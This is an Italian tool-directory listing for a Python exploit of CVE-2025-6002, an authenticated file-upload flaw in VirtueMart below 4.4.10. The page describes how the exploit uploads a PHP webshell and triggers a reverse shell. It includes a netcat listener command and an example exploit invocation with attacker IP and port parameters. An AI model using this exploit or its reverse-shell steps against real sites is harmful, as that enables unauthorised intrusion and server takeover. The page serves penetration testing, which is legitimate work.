Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-6002 — Exploit Python per CVE-2025-6002 che mira a un upload arbitrario di file autenticato in VirtueMart < 4.4.10. Effettua il login, carica una webshell PHP e attiva una reverse shell per il penetration testing. | Kitploit
Strumenti/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration Testing
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

Exploit Python per CVE-2025-6002 che mira a un upload arbitrario di file autenticato in VirtueMart < 4.4.10. Effettua il login, carica una webshell PHP e attiva una reverse shell per il penetration testing.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4 mesi faNon ancora revisionato

Exploit per CVE-2025-6002

Questo script sfrutta la vulnerabilità di caricamento arbitrario di file autenticato in VirtueMart < 4.4.10 (CVE-2025-6002), descritta in questo post del blog: https://blog.blacklanternsecurity.com/p/doomla-zero-days

Questo script effettua il login a VirtueMart con le credenziali fornite, crea un nuovo prodotto e carica una webshell PHP come file multimediale. Quindi invoca una reverse shell all'IP/porta forniti.

Parametri:

  • --url: L'URL di VirtueMart
  • --username: nome utente admin
  • --password: password admin
  • --remote-ip: indirizzo IP dell'attaccantehttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: porta dell'attaccante

Utilizzo:

  1. Esegui Netcat sulla macchina dell'attaccante:
root@kitploit:~
nc -nlvp 1337
  1. Esegui l'exploit:
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
Scarica lo strumento